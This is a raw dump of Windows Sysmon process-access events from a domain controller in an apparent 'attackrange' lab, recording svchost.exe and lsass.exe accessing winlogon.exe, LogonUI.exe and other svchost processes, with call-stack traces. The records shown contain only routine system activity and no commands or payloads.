08:41:55.152{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002533Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.152{5D479F2C-16A1-5F84-1000-000000007F01}11442184C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+45079|C:\Windows\SYSTEM32\ntdll.dll+29bfa|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002532Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.152{5D479F2C-16A1-5F84-1000-000000007F01}11441660C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002531Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.152{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002530Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.152{5D479F2C-16A1-5F84-1000-000000007F01}11442184C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+45079|C:\Windows\SYSTEM32\ntdll.dll+29bfa|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002529Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002528Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.136{5D479F2C-16A1-5F84-1000-000000007F01}11441660C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002527Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002526Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002525Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002524Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002523Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002522Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002521Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-0E00-000000007F01}1092C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+d69b2|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002520Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+599c8|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002519Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+581c4|C:\Windows\System32\RPCRT4.dll+39bd0|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002518Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.120{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+581c4|C:\Windows\System32\RPCRT4.dll+39bd0|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002517Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002516Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002515Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.120{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002514Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002513Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002512Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002511Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002510Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002509Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.027{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002508Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\